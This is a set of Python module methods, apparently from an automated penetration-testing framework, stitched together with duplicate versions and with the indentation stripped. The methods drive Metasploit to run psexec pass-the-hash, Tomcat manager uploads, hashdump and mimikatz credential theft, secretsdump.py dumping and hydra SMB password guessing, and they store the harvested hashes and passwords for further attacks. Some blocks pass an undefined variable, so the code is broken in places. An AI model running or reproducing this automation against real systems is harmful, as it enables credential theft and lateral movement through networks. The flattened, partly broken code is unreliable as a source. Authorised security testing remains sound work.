def process(self):
# load any targets we are interested in
self.getTargets()
# loop over each target
for t in self.targets:
# test for NULL authentication first
if not self.seentarget(t):
self.addseentarget(t)
self.searchTarget(t, '', '', '')
# test for any local users
for user in self.getUsers(t):
passwords = kb.get(['creds/host/' + t + '/username/' + user + '/password'])
for password in passwords:
if not self.seentarget(t + user + password):
self.addseentarget(t + user + password)
self.searchTarget(t, user, password, "")
# test for any domain users
domains = kb.get("host/" + t + "/domain")
for domain in domains:
for user in self.getDomainUsers(domain):
passwords = kb.get(['creds/domain/' + t + '/username/' + user + '/password'])
for password in passwords:
if not self.seentarget(t + user + password + domain):
self.addseentarget(t + user + password + domain)
self.searchTarget(t, user, password, domain)
return
def process(self):
# load any targets we are interested in
self.getTargets()
# loop over each target
for t in self.targets:
# test for NULL authentication first
if not self.seentarget(t):
self.addseentarget(t)
self.searchTarget(t, '', '', '')
# test for any local users
for user in self.getUsers(t):
passwords = kb.get(
['creds/host/' + t + '/username/' + user + '/password'])
for password in passwords:
if not self.seentarget(t + user + password):
self.addseentarget(t + user + password)
self.searchTarget(t, user, password, "")
# test for any domain users
domains = kb.get("host/" + t + "/domain")
for domain in domains:
for user in self.getDomainUsers(domain):
passwords = kb.get([
'creds/domain/' + t + '/username/' + user + '/password'
])
for password in passwords:
if not self.seentarget(t + user + password + domain):
self.addseentarget(t + user + password + domain)
self.searchTarget(t, user, password, domain)
return
def process(self):
# load any targets we are interested in
self.getTargets()
# loop over each target
for t in self.targets:
users = kb.get(['host/' + t + '/user'])
self.display.verbose(self.shortName + " - Connecting to " + t)
for user in users:
# verify we have not tested this host before
if not self.seentarget(t + str(user)):
# add the new IP to the already seen list
self.addseentarget(t + str(user))
passwords = kb.get(['host/' + t + '/user/' + user + '/password'])
for password in passwords:
self.display.verbose(self.shortName + " - Connecting to " + t)
# make outfile
temp_file = self.config[
"proofsDir"] + self.shortName + "_" + t + "_" + user + "_" + Utils.getRandStr(
10)
# run secretesdump.py
command = "secretsdump.py -outputfile " + temp_file + " \"" + user + "\":\"" + password + \
"\"@" + t
result = Utils.execWait(command, None)
# TODO
# parse out put and store any new info and fire any additional triggers
return
def process(self):
# load any targets we are interested in
self.getTargets()
if len(self.targets) > 0:
# connect to msfrpc
msf = myMsf(host=self.config['msfhost'],
port=self.config['msfport'],
user=self.config['msfuser'],
password=self.config['msfpass'])
if not msf.isAuthenticated():
return
# loop over each target
for t in self.targets:
users = kb.get("host/" + t + "/user")
for user in users:
hashes = kb.get("host/" + t + "/user/" + user +
"/fullhash")
for passhash in hashes:
# verify we have not tested this host before
if not self.seentarget(t + user + passhash):
# add the new IP to the already seen list
self.addseentarget(t + user + passhash)
self.display.verbose(self.shortName +
" - Connecting to " + t)
msf.execute("use exploit/windows/smb/psexec\n")
# msf.execute("set PAYLOAD windows/meterpreter/bind_tcp\n")
# msf.execute("set LHOST %s\n" % self.config['lhost'])
# msf.execute("set LPORT %i\n" % int(Utils.getUnusedPort()))
# msf.execute("set LPORT 4444\n")
msf.execute("set RPORT 445\n")
msf.execute("set RHOST " + t + "\n")
msf.execute("set SMBUser " + user + "\n")
msf.execute("set SMBPass " + passhash + "\n")
msf.execute("exploit -j\n")
msf.sleep(int(self.config['msfexploitdelay']))
outfile = self.config[
"proofsDir"] + self.shortName + "_" + t + "_" + Utils.getRandStr(
10)
result = msf.getResult()
Utils.writeFile(result, outfile)
kb.add("host/" + t + "/files/" + self.shortName +
"/" + outfile.replace("/", "%2F"))
parts = re.findall(
".*Meterpreter session (\d+) opened.*", result)
for part in parts:
self.fire("msfSession")
self.display.verbose("NEW session on : " + t)
kb.add("host/" + t + "/msfSession/" +
str(part))
# clean up after ourselves
result = msf.cleanup()
return
def process(self):
# load any targets we are interested in
self.getTargets()
if len(self.targets) > 0:
# If any results are succesful, this will become true and Fire will be called in the end
callFire = False
# loop over each target
for t in self.targets:
ports = kb.get('service/http/' + t + '/tcp')
for p in ports:
users = kb.get("creds/service/tomcat/" + t + "/tcp/" + p +
"/username")
for user in users:
passwords = kb.get("creds/service/tomcat/" + t +
"/tcp/" + p + "/username/" + user +
"/password")
for password in passwords:
# verify we have not tested this host before
if not self.seentarget(t + p + user + password):
# add the new IP to the already seen list
self.addseentarget(t + p + user + password)
cmd = {
'config': [
"use exploit/multi/http/tomcat_mgr_upload",
"set RHOST %s" % t,
"set RPORT %s" % p,
"set HTTPUSERNAME %s" % user,
"set HTTPPASSWORD %s" % password,
"set fingerprintcheck false",
"set target 2"
],
'payload':
'win'
}
result, outfile = self.msfExec(t, cmds)
parts = re.findall(".*Meterpreter session.*",
result)
for part in parts:
callFire = True
self.addVuln(
t, self.shortName, {
"port": p,
"username": user,
"password": password,
"output": outfile.replace(
"/", "%2F")
})
if callFire:
self.fire("msfSession")
return
def process(self):
# load any targets we are interested in
self.getTargets()
if len(self.targets) > 0:
# connect to msfrpc
msf = myMsf(host=self.config['msfhost'], port=self.config['msfport'], user=self.config['msfuser'],
password=self.config['msfpass'])
if not msf.isAuthenticated():
return
# loop over each target
for t in self.targets:
users = kb.get("host/" + t + "/user")
for user in users:
hashes = kb.get ("host/" + t + "/user/" + user + "/fullhash")
for passhash in hashes:
# verify we have not tested this host before
if not self.seentarget(t+user+passhash):
# add the new IP to the already seen list
self.addseentarget(t+user+passhash)
self.display.verbose(self.shortName + " - Connecting to " + t)
msf.execute("use exploit/windows/smb/psexec\n")
# msf.execute("set PAYLOAD windows/meterpreter/bind_tcp\n")
# msf.execute("set LHOST %s\n" % self.config['lhost'])
# msf.execute("set LPORT %i\n" % int(Utils.getUnusedPort()))
# msf.execute("set LPORT 4444\n")
msf.execute("set RPORT 445\n")
msf.execute("set RHOST " + t + "\n")
msf.execute("set SMBUser " + user + "\n")
msf.execute("set SMBPass " + passhash + "\n")
msf.execute("exploit -j\n")
msf.sleep(int(self.config['msfexploitdelay']))
outfile = self.config["proofsDir"] + self.shortName + "_" + t + "_" + Utils.getRandStr(10)
result = msf.getResult()
Utils.writeFile(result, outfile)
kb.add("host/" + t + "/files/" + self.shortName + "/" + outfile.replace("/", "%2F"))
parts = re.findall(".*Meterpreter session (\d+) opened.*", result)
for part in parts:
self.fire("msfSession")
self.display.verbose("NEW session on : " + t)
kb.add("host/" + t + "/msfSession/" + str(part))
# clean up after ourselves
result = msf.cleanup()
return
def process(self):
# load any targets we are interested in
self.getTargets()
# loop over each target
for t in self.targets:
users = kb.get(['host/' + t + '/user'])
self.display.verbose(self.shortName + " - Connecting to " + t)
for user in users:
# verify we have not tested this host before
if not self.seentarget(t + str(user)):
# add the new IP to the already seen list
self.addseentarget(t + str(user))
passwords = kb.get(
['host/' + t + '/user/' + user + '/password'])
for password in passwords:
self.display.verbose(self.shortName +
" - Connecting to " + t)
# make outfile
temp_file = self.config[
"proofsDir"] + self.shortName + "_" + t + "_" + user + "_" + Utils.getRandStr(
10)
# run secretesdump.py
command = self.config["secretsdump.py"] + " -outputfile " + temp_file + " \"" + user + "\":\"" + password + \
"\"@" + t
result = Utils.execWait(command, None)
if Utils.isReadable(temp_file + '.sam'):
with open(temp_file + '.sam', "r") as myfile:
result = myfile.readlines()
for line in result:
m = line.split(':')
user = m[0].strip()
uid = m[1].strip()
lmhash = m[2].strip()
ntlmhash = m[3].strip()
kb.add("host/" + t + "/user/" + user +
"/lmhash/" + lmhash)
kb.add("host/" + t + "/user/" + user +
"/ntlmhash/" + ntlmhash)
kb.add("host/" + t + "/user/" + user +
"/fullhash/" + lmhash + ":" + ntlmhash)
self.fire("newNTLMHash")
return
def process(self):
# load any targets we are interested in
self.getTargets()
# loop over each target
for t in self.targets:
ports = kb.get([
'service/https/host/' + t + '/tcpport',
'service/ssl/host/' + t + '/tcpport'
])
for port in ports:
# verify we have not tested this host before
if not self.seentarget(t + str(port)):
# add the new IP to the already seen list
self.addseentarget(t + str(port))
# make outfile
temp_file = self.config[
"proofsDir"] + self.shortName + "_" + t + "_" + str(
port) + "_" + Utils.getRandStr(10)
command = "java -jar " + self.config[
"miscDir"] + "TestSSLServer.jar " + t + " " + port
result = Utils.execWait(command, temp_file, timeout=30)
# TODO - parse output and store results?
# print result
return
def process(self):
# load any targets we are interested in
self.getTargets()
# loop over each target
for t in self.targets:
ports = kb.get([
'service/https/host/' + t + '/tcpport',
'service/ssl/host/' + t + '/tcpport'
])
for port in ports:
# verify we have not tested this host before
if not self.seentarget(t + str(port)):
# add the new IP to the already seen list
self.addseentarget(t + str(port))
# run nmap
n = mynmap(self.config, self.display)
scan_results = n.run(
target=t,
flags=
"--script ssl-ccs-injection,ssl-cert,ssl-date,ssl-dh-params,"
"ssl-enum-ciphers,ssl-google-cert-catalog,ssl-heartbleed,"
"ssl-known-key,ssl-poodle,sslv2",
ports=str(port),
vector=self.vector,
filetag=t + "_" + str(port) + "_SSLSCAN")['scan']
return
def process(self):
# load any targets we are interested in
self.getTargets()
if len(self.targets) > 0:
# loop over each target
for t in self.targets:
# verify we have not tested this host before
if not self.seentarget(t):
# add the new IP to the already seen list
self.addseentarget(t)
comStrings = kb.get("vuln/host/" + t +
"/snmpCred/communityString")
for comString in comStrings:
cmd = {
'config': [
"use auxiliary/scanner/snmp/snmp_enumshares",
"set RHOSTS %s" % t,
"set COMMUNITY %s" % comString
],
'payload':
'none'
}
result, outfile = self.msfExec(t, cmds)
# Don't need to parse out IP, we are running module one IP at a time
# Just find lines with - and pull out share name
parts = re.findall(".* - .*", result)
for part in parts:
sharename = (part.split('-')[0]).strip()
kb.add("share/smb/" + t + "/" + sharename)
return
def process(self):
# load any targets we are interested in
self.getTargets()
if len(self.targets) > 0:
# loop over each target
for t in self.targets:
users = self.getUsers(t)
for user in users:
hashes = kb.get ("creds/host/" + t + "/username/" + user + "/fullhash")
for passhash in hashes:
# verify we have not tested this host before
if not self.seentarget(t+user+passhash):
# add the new IP to the already seen list
self.addseentarget(t+user+passhash)
cmd = {
'config':[
"use exploit/windows/smb/psexec",
"set RPORT 445",
"set RHOST %s" % t,
"set SMBUser %s" % user,
"set SMBPass %s" % passhash
],
'payload':'win'}
result, outfile = self.msfExec(t, cmds)
parts = re.findall(".*Meterpreter session (\d+) opened.*", result)
for part in parts:
self.fire("msfSession")
self.display.verbose("NEW session on : " + t)
kb.add("shell/" + t + "/msf/" + str(part))
return
def process(self):
# load any targets we are interested in
self.getTargets()
# loop over each target
for t in self.targets:
users = kb.get(['host/' + t + '/user'])
self.display.verbose(self.shortName + " - Connecting to " + t)
for user in users:
# verify we have not tested this host before
if not self.seentarget(t + str(user)):
# add the new IP to the already seen list
self.addseentarget(t + str(user))
# make outfile
temp_file = self.config["proofsDir"] + self.shortName + "_" + t + "_" + Utils.getRandStr(10)
command = "hydra -s 445 -l " + user + " -P " + self.config[
"miscDir"] + "passwords.txt smb://" + t
result = Utils.execWait(command, temp_file, timeout=30)
# Extract usernames & passwords from results and add to KB
parts = re.findall(".* login:\s\s*([^\s]*)\s\s*password:\s\s*([^\s]*)", result)
for part in parts:
self.fire("newSmbPassword")
self.addVuln(t, "guessable password", {"output": temp_file.replace("/", "%2F")})
self.display.debug(
"Identified username [" + part[0] + "] with password [" + part[1] + "] on " + t)
kb.add("host/" + t + "/user/" + part[0].strip() + "/password/" + part[1].strip())
return
def process(self):
# load any targets we are interested in
self.getTargets()
if len(self.targets) > 0:
# loop over each target
for t in self.targets:
if not self.seentarget(t):
# add the new IP to the already seen list
self.addseentarget(t)
cstrings = kb.get("vuln/host/" + t +
"/snmpCred/communityString")
for community in cstrings:
command = self.config[
"snmpwalk"] + " -v 2c -c " + community + " " + t
result = command + "\n" + Utils.execWait(
command) #append command to top of output
outfile = self.config[
"proofsDir"] + self.shortName + "_" + t + "_" + Utils.getRandStr(
10)
Utils.writeFile(result, outfile)
kb.add("host/" + t + "/vuln/snmpCred/output/" +
outfile.replace("/", "%2F"))
return
def process(self):
# load any targets we are interested in
self.getTargets()
for t in self.targets:
sessions = kb.get('host/' + t + '/msfSession')
if len(sessions) > 0:
# connect to msfrpc
msf = myMsf(host=self.config['msfhost'], port=self.config['msfport'], user=self.config['msfuser'],
password=self.config['msfpass'])
if msf.isAuthenticated():
# loop over each target
for s in sessions:
# verify we have not tested this session before
if not self.seentarget(s):
# add the new IP to the already seen list
self.addseentarget(s)
msf.execute("sessions -i " + str(s) + "\n")
msf.sleep(int(self.config['msfexploitdelay']))
msf.execute("getuid\n")
msf.sleep(int(self.config['msfexploitdelay']))
msf.execute("background\n")
outfile = self.config[
"proofsDir"] + self.shortName + "_GetUid_" + t + "_" + Utils.getRandStr(
10)
text = msf.getResult()
Utils.writeFile(text, outfile)
kb.add("host/" + t + "/files/" + self.shortName + "/" + outfile.replace("/", "%2F"))
for line in text.splitlines():
m = re.match(r'^\s*Server username: (.*)\s*', line)
if (m):
self.display.verbose("Metasploit Session [" + s +
"] running as user [" + m.group(1).strip() + "]")
msf.execute("sessions -i " + str(s) + "\n")
msf.sleep(int(self.config['msfexploitdelay']))
msf.execute("sysinfo\n")
msf.sleep(int(self.config['msfexploitdelay']))
msf.execute("background\n")
outfile = self.config[
"proofsDir"] + self.shortName + "_SysInfo_" + t + "_" + Utils.getRandStr(
10)
text = msf.getResult()
Utils.writeFile(text, outfile)
kb.add("host/" + t + "/files/" + self.shortName + "/" + outfile.replace("/", "%2F"))
for line in text.splitlines():
m = re.match(r'^\s*OS\s\s*: (.*)\s*', line)
if (m):
self.display.verbose("Metasploit Session [" + s +
"] running on OS [" + m.group(1).strip() + "]")
# clean up after ourselves
result = msf.cleanup()
return
def process(self):
# load any targets we are interested in
self.getTargets()
if len(self.targets) > 0:
# connect to msfrpc
msf = myMsf(host=self.config['msfhost'],
port=int(self.config['msfport']),
user=self.config['msfuser'],
password=self.config['msfpass'])
if not msf.isAuthenticated():
return
# loop over each target
for t in self.targets:
# verify we have not tested this host before
if not self.seentarget(t):
# add the new IP to the already seen list
self.addseentarget(t)
self.display.verbose(self.shortName + " - Connecting to " +
t)
# Get list of working community strings for this host
comStrings = kb.get("vuln/host/" + t +
"/snmpCred/communityString")
for comString in comStrings:
myMsf.lock.acquire()
msf.execute(
"use auxiliary/scanner/snmp/snmp_enumusers\n")
msf.execute("set RHOSTS %s\n" % t)
msf.execute("set COMMUNITY %s\n" % comString)
msf.execute("exploit\n")
msf.sleep(int(self.config['msfexploitdelay']))
result = msf.getResult()
while (re.search(".*execution completed.*", result) is
None):
result = result + msf.getResult()
myMsf.lock.release()
outfile = self.config[
"proofsDir"] + self.shortName + "_" + t + "_" + Utils.getRandStr(
10)
Utils.writeFile(result, outfile)
kb.add("host/" + t + "/files/" + self.shortName + "/" +
outfile.replace("/", "%2F"))
# Extract usernames from results and add to KB
parts = re.findall(".* users: .*", result)
for part in parts:
userlist = (part.split(':')[2]).split(',')
for username in userlist:
kb.add("creds/host/" + t + "/username/" +
username.strip())
# clean up after ourselves
result = msf.cleanup()
return
def process(self):
# load any targets we are interested in
self.getTargets()
for t in self.targets:
sessions = kb.get('host/' + t + '/msfSession')
if len(sessions) > 0:
# connect to msfrpc
msf = myMsf(host=self.config['msfhost'],
port=self.config['msfport'],
user=self.config['msfuser'],
password=self.config['msfpass'])
if msf.isAuthenticated():
# loop over each target
for s in sessions:
# verify we have not tested this session before
if not self.seentarget(s):
# add the new IP to the already seen list
self.addseentarget(s)
msf.execute("sessions -i " + str(s) + "\n")
msf.sleep(int(self.config['msfexploitdelay']))
msf.execute("hashdump\n")
msf.sleep(int(self.config['msfexploitdelay']))
msf.execute("background\n")
# TODO - process results and store results in KB
# regex match on [^:]+:[^:]+:[^:]+:[^:]+:::
outfile = self.config[
"proofsDir"] + self.shortName + "_HashDump_" + t + "_" + Utils.getRandStr(
10)
text = msf.getResult()
Utils.writeFile(text, outfile)
kb.add("host/" + t + "/files/" + self.shortName +
"/" + outfile.replace("/", "%2F"))
msf.execute("sessions -i " + str(s) + "\n")
msf.sleep(int(self.config['msfexploitdelay']))
msf.execute("load mimikatz\n")
msf.sleep(int(self.config['msfexploitdelay']))
msf.execute("wdigest\n")
msf.sleep(int(self.config['msfexploitdelay']))
msf.execute("background\n")
# TODO - process results and store results in KB
outfile = self.config[
"proofsDir"] + self.shortName + "_Mimikatz_" + t + "_" + Utils.getRandStr(
10)
text = msf.getResult()
Utils.writeFile(text, outfile)
kb.add("host/" + t + "/files/" + self.shortName +
"/" + outfile.replace("/", "%2F"))
# clean up after ourselves
result = msf.cleanup()
return
def process(self):
# load any targets we are interested in
self.getTargets()
if len(self.targets) > 0:
# connect to msfrpc
msf = myMsf(host=self.config['msfhost'],
port=int(self.config['msfport']),
user=self.config['msfuser'],
password=self.config['msfpass'])
if not msf.isAuthenticated():
return
# loop over each target
for t in self.targets:
ports = kb.get('service/http/' + t + '/tcp')
for p in ports:
# verify we have not tested this host before
if not self.seentarget(t + p):
# add the new IP to the already seen list
self.addseentarget(t + p)
myMsf.lock.acquire()
self.display.verbose(self.shortName +
" - Connecting to " + t)
msf.execute(
"use auxiliary/scanner/http/tomcat_mgr_login\n")
msf.execute("set RHOSTS %s\n" % t)
msf.execute("set RPORT %s\n" % p)
msf.execute("exploit -j\n")
msf.sleep(int(self.config['msfexploitdelay']))
outfile = self.config[
"proofsDir"] + self.shortName + "_" + t + "_" + Utils.getRandStr(
10)
result = msf.getResult()
myMsf.lock.release()
Utils.writeFile(result, outfile)
kb.add("host/" + t + "/files/" + self.shortName + "/" +
outfile.replace("/", "%2F"))
for line in result.splitlines():
m = re.match(r'.*Successful: (.*):(.*)', line)
if (m):
self.display.error("Tomcat on [" + t + ":" +
p +
"] has default creds of [" +
m.group(1).strip() + "]/[" +
m.group(2).strip() + "]")
kb.add("creds/service/tomcat/" + t + "/tcp/" +
p + "/username/" + m.group(1).strip() +
"/password/" + m.group(2).strip())
self.fire("newTomcatPassword")
# clean up after ourselves
result = msf.cleanup()
return
def process(self):
# load any targets we are interested in
self.getTargets()
for t in self.targets:
sessions = kb.get('shell/' + t + '/msf')
if len(sessions) > 0:
# connect to msfrpc
msf = myMsf(host=self.config['msfhost'], port=self.config['msfport'], user=self.config['msfuser'],
password=self.config['msfpass'])
if msf.isAuthenticated():
# loop over each target
for s in sessions:
# verify we have not tested this session before
if not self.seentarget(s):
# add the new IP to the already seen list
self.addseentarget(s)
myMsf.lock.acquire()
msf.execute("sessions -i " + str(s) + "\n")
msf.sleep(int(self.config['msfexploitdelay']))
msf.execute("hashdump\n")
msf.sleep(int(self.config['msfexploitdelay']))
msf.execute("background\n")
msf.sleep(int(self.config['msfexploitdelay']))
# TODO - process results and store results in KB
# regex match on [^:]+:[^:]+:[^:]+:[^:]+:::
outfile = self.config[
"proofsDir"] + self.shortName + "_HashDump_" + t + "_" + Utils.getRandStr(
10)
text = msf.getResult()
myMsf.lock.release()
Utils.writeFile(text, outfile)
kb.add("host/" + t + "/files/" + self.shortName + "/" + outfile.replace("/", "%2F"))
msf.execute("sessions -i " + str(s) + "\n")
msf.sleep(int(self.config['msfexploitdelay']))
msf.execute("load mimikatz\n")
msf.sleep(int(self.config['msfexploitdelay']))
msf.execute("wdigest\n")
msf.sleep(int(self.config['msfexploitdelay']))
msf.execute("background\n")
# TODO - process results and store results in KB
outfile = self.config[
"proofsDir"] + self.shortName + "_Mimikatz_" + t + "_" + Utils.getRandStr(
10)
text = msf.getResult()
Utils.writeFile(text, outfile)
kb.add("host/" + t + "/files/" + self.shortName + "/" + outfile.replace("/", "%2F"))
# clean up after ourselves
result = msf.cleanup()
return
def process(self):
# load any targets we are interested in
self.getTargets()
# loop over each target
for t in self.targets:
# verify we have not tested this host before
ports = kb.get('service/http/' + t + '/tcp')
for port in ports:
if not self.seentarget(t + str(port)):
self.addseentarget(t+str(port))
outfile = self.config["proofsDir"] + self.shortName + "_" + t + "_" + str(port) + "_" + Utils.getRandStr(10) + ".txt"
command = "python " + self.config["jexboss"] + " -mode file-scan -out " + outfile + " -file <(echo \"http://" + t + ":" + str(port) + "\")"
result = Utils.execWait(command)
kb.add("host/" + t + "/files/" + self.shortName + "/" + outfile.replace("/", "%2F" ))
contents = []
with open (outfile, "r") as myfile:
contents = myfile.readlines()
for line in contents:
m = re.match(r'^.*VULNERABLE TO (.*)\].*', line)
if (m):
vuln = m.group(1).strip()
self.addVuln(t, self.shortName + "-" + vuln, {"port": port, "output": outfile.replace("/", "%2F")})
ports = kb.get('service/https/' + t + '/tcp')
for port in ports:
if not self.seentarget(t + str(port)):
self.addseentarget(t+str(port))
outfile = self.config["proofsDir"] + self.shortName + "_" + t + "_" + str(port) + "_" + Utils.getRandStr(10) + ".txt"
command = "python " + self.config["jexboss"] + " -mode file-scan -out " + outfile + " -file <(echo \"https://" + t + ":" + str(port) + "\")"
result = Utils.execWait(command)
kb.add("host/" + t + "/files/" + self.shortName + "/" + outfile.replace("/", "%2F" ))
contents = []
with open (outfile, "r") as myfile:
contents = myfile.readlines()
for line in contents:
m = re.match(r'^.*VULNERABLE TO (.*)\].*', line)
if (m):
vuln = m.group(1).strip()
self.addVuln(t, self.shortName + "-" + vuln, {"port": port, "output": outfile.replace("/", "%2F")})
return
def process(self):
# load any targets we are interested in
self.getTargets()
# loop over each target
for t in self.targets:
ports = kb.get('service/ftp/' + t + '/tcp')
for p in ports:
self.testTarget(t, p)
return
def process(self):
# load any targets we are interested in
self.getTargets()
# loop over each target
for t in self.targets:
ports = kb.get('service/ftp/' + t + '/tcp')
for p in ports:
self.testTarget(t, p)
return
def process(self):
# load any targets we are interested in
self.getTargets()
if len(self.targets) > 0:
# connect to msfrpc
msf = myMsf(host=self.config['msfhost'],
port=int(self.config['msfport']),
user=self.config['msfuser'],
password=self.config['msfpass'])
if not msf.isAuthenticated():
return
# loop over each target
for t in self.targets:
# verify we have not tested this host before
if not self.seentarget(t):
# add the new IP to the already seen list
self.addseentarget(t)
self.display.verbose(self.shortName + " - Connecting to " +
t)
# Get list of working community strings for this host
comStrings = kb.get("host/" + t +
"/vuln/snmpCred/communityString")
for comString in comStrings:
msf.execute(
"use auxiliary/scanner/snmp/snmp_enumshares\n")
msf.execute("set RHOSTS %s\n" % t)
msf.execute("set COMMUNITY %s\n" % comString)
msf.execute("run\n")
result = msf.getResult()
while (re.search(".*execution completed.*", result) is
None):
result = result + msf.getResult()
outfile = self.config[
"proofsDir"] + self.shortName + "_" + t + "_" + Utils.getRandStr(
10)
Utils.writeFile(result, outfile)
kb.add("host/" + t + "/files/" + self.shortName + "/" +
outfile.replace("/", "%2F"))
# Don't need to parse out IP, we are running module one IP at a time
# Just find lines with - and pull out share name
parts = re.findall(".* - .*", result)
for part in parts:
sharename = (part.split('-')[0]).strip()
kb.add("host/" + t + "/share/smb/" + sharename)
# clean up after ourselves
result = msf.cleanup()
return
def process(self):
# load any targets we are interested in
self.getTargets()
for t in self.targets:
sessions = kb.get('shell/' + t + '/msf')
if len(sessions) > 0:
# loop over each target
for s in sessions:
# verify we have not tested this session before
if not self.seentarget(s):
# add the new IP to the already seen list
self.addseentarget(s)
cmd = {
'config': [
"sessions -i %s" % str(s), "SLEEP", "getuid",
"SLEEP", "background", "SLEEP"
],
'payload':
'none'
}
result, outfile = self.msfExec(t, cmds)
for line in result.splitlines():
m = re.match(r'^\s*Server username: (.*)\s*', line)
if (m):
self.display.verbose("Metasploit Session [" +
s +
"] running as user [" +
m.group(1).strip() + "]")
cmd = {
'config': [
"sessions -i %s" % str(s), "SLEEP", "sysinfo",
"SLEEP", "background", "SLEEP"
],
'payload':
'none'
}
result, outfile = self.msfExec(t, cmds)
for line in result.splitlines():
m = re.match(r'^\s*OS\s\s*: (.*)\s*', line)
if (m):
self.display.verbose("Metasploit Session [" +
s + "] running on OS [" +
m.group(1).strip() + "]")
return
def process(self):
# load any targets we are interested in
self.getTargets()
for t in self.targets:
sessions = kb.get('host/' + t + '/msfSession')
if len(sessions) > 0:
# connect to msfrpc
msf = myMsf(host=self.config['msfhost'],
port=self.config['msfport'],
user=self.config['msfuser'],
password=self.config['msfpass'])
if msf.isAuthenticated():
# loop over each target
for s in sessions:
# verify we have not tested this session before
if not self.seentarget(s):
# add the new IP to the already seen list
self.addseentarget(s)
msf.execute("sessions -i " + str(s) + "\n")
msf.execute("getuid\n")
msf.execute("background\n")
# TODO - process results and store dat to KB
outfile = self.config[
"proofsDir"] + self.shortName + "_GetUid_" + t + "_" + Utils.getRandStr(
10)
text = msf.getResult()
Utils.writeFile(text, outfile)
kb.add("host/" + t + "/files/" + self.shortName +
"/" + outfile.replace("/", "%2F"))
msf.execute("sessions -i " + str(s) + "\n")
msf.execute("sysinfo\n")
msf.execute("background\n")
# TODO - process results and store dat to KB
outfile = self.config[
"proofsDir"] + self.shortName + "_SysInfo_" + t + "_" + Utils.getRandStr(
10)
text = msf.getResult()
Utils.writeFile(text, outfile)
kb.add("host/" + t + "/files/" + self.shortName +
"/" + outfile.replace("/", "%2F"))
# clean up after ourselves
result = msf.cleanup()
return
def process(self):
# load any targets we are interested in
self.getTargets()
# loop over each target
for t in self.targets:
# verify we have not tested this host before
ports = kb.get(['service/http/host/' + t + '/tcpport', 'service/https/host/' + t + '/tcpport'])
for port in ports:
self.processTarget(t, port)
for hostname in self.getHostnames(t):
self.processTarget(hostname, port)
return
def process(self):
# load any targets we are interested in
self.getTargets()
# loop over each target
for t in self.targets:
# verify we have not tested this host before
ports = kb.get('service/http' + t + '/tcp', 'service/https/' + t + '/tcp')
for port in ports:
self.processTarget(t, port)
for hostname in self.getHostnames(t):
self.processTarget(hostname, port)
return
def process(self):
# load any targets we are interested in
self.getTargets()
if len(self.targets) > 0:
# connect to msfrpc
msf = myMsf(host=self.config['msfhost'], port=int(self.config['msfport']), user=self.config['msfuser'],
password=self.config['msfpass'])
if not msf.isAuthenticated():
return
# loop over each target
for t in self.targets:
# verify we have not tested this host before
if not self.seentarget(t):
# add the new IP to the already seen list
self.addseentarget(t)
self.display.verbose(self.shortName + " - Connecting to " + t)
# Get list of working community strings for this host
comStrings = kb.get("vuln/host/" + t + "/snmpCred/communityString")
for comString in comStrings:
myMsf.lock.acquire()
msf.execute("use auxiliary/scanner/snmp/snmp_enumshares\n")
msf.execute("set RHOSTS %s\n" % t)
msf.execute("set COMMUNITY %s\n" % comString)
msf.execute("exploit\n")
msf.sleep(int(self.config['msfexploitdelay']))
result = msf.getResult()
while (re.search(".*execution completed.*", result) is None):
result = result + msf.getResult()
myMsf.lock.release()
outfile = self.config["proofsDir"] + self.shortName + "_" + t + "_" + Utils.getRandStr(10)
Utils.writeFile(result, outfile)
kb.add("host/" + t + "/files/" + self.shortName + "/" + outfile.replace("/", "%2F"))
# Don't need to parse out IP, we are running module one IP at a time
# Just find lines with - and pull out share name
parts = re.findall(".* - .*", result)
for part in parts:
sharename = (part.split('-')[0]).strip()
kb.add("share/smb/" + t + "/" + sharename)
# clean up after ourselves
result = msf.cleanup()
return
def process(self):
# load any targets we are interested in
self.getTargets()
for t in self.targets:
sessions = kb.get('host/' + t + '/msfSession')
if len(sessions) > 0:
# connect to msfrpc
msf = myMsf(host=self.config['msfhost'], port=self.config['msfport'], user=self.config['msfuser'],
password=self.config['msfpass'])
if msf.isAuthenticated():
# loop over each target
for s in sessions:
# verify we have not tested this session before
if not self.seentarget(s):
# add the new IP to the already seen list
self.addseentarget(s)
msf.execute("sessions -i " + str(s) + "\n")
msf.execute("getuid\n")
msf.execute("background\n")
# TODO - process results and store dat to KB
outfile = self.config[
"proofsDir"] + self.shortName + "_GetUid_" + t + "_" + Utils.getRandStr(
10)
text = msf.getResult()
Utils.writeFile(text, outfile)
kb.add("host/" + t + "/files/" + self.shortName + "/" + outfile.replace("/", "%2F"))
msf.execute("sessions -i " + str(s) + "\n")
msf.execute("sysinfo\n")
msf.execute("background\n")
# TODO - process results and store dat to KB
outfile = self.config[
"proofsDir"] + self.shortName + "_SysInfo_" + t + "_" + Utils.getRandStr(
10)
text = msf.getResult()
Utils.writeFile(text, outfile)
kb.add("host/" + t + "/files/" + self.shortName + "/" + outfile.replace("/", "%2F"))
# clean up after ourselves
result = msf.cleanup()
return
def process(self):
# load any targets we are interested in
self.getTargets()
if len(self.targets) > 0:
# connect to msfrpc
msf = myMsf(host=self.config['msfhost'], port=int(self.config['msfport']), user=self.config['msfuser'],
password=self.config['msfpass'])
if not msf.isAuthenticated():
return
# loop over each target
for t in self.targets:
# verify we have not tested this host before
if not self.seentarget(t):
# add the new IP to the already seen list
self.addseentarget(t)
self.display.verbose(self.shortName + " - Connecting to " + t)
# Get list of working community strings for this host
comStrings = kb.get("host/" + t + "/vuln/snmpCred/communityString")
for comString in comStrings:
msf.execute("use auxiliary/scanner/snmp/snmp_enumusers\n")
msf.execute("set RHOSTS %s\n" % t)
msf.execute("set COMMUNITY %s\n" % comString)
msf.execute("run\n")
msf.sleep(int(self.config['msfexploitdelay']))
result = msf.getResult()
while (re.search(".*execution completed.*", result) is None):
result = result + msf.getResult()
outfile = self.config["proofsDir"] + self.shortName + "_" + t + "_" + Utils.getRandStr(10)
Utils.writeFile(result, outfile)
kb.add("host/" + t + "/files/" + self.shortName + "/" + outfile.replace("/", "%2F"))
# Extract usernames from results and add to KB
parts = re.findall(".* users: .*", result)
for part in parts:
userlist = (part.split(':')[2]).split(',')
for username in userlist:
kb.add("host/" + t + "/user/" + username.strip())
# clean up after ourselves
result = msf.cleanup()
return
def process(self):
# load any targets we are interested in
self.getTargets()
if len(self.targets) > 0:
# connect to msfrpc
msf = myMsf(host=self.config['msfhost'], port=int(self.config['msfport']), user=self.config['msfuser'], password=self.config['msfpass'])
if not msf.isAuthenticated():
return
# loop over each target
for t in self.targets:
ports = kb.get('service/http/' + t + '/tcp')
for p in ports:
# verify we have not tested this host before
if not self.seentarget(t+p):
# add the new IP to the already seen list
self.addseentarget(t+p)
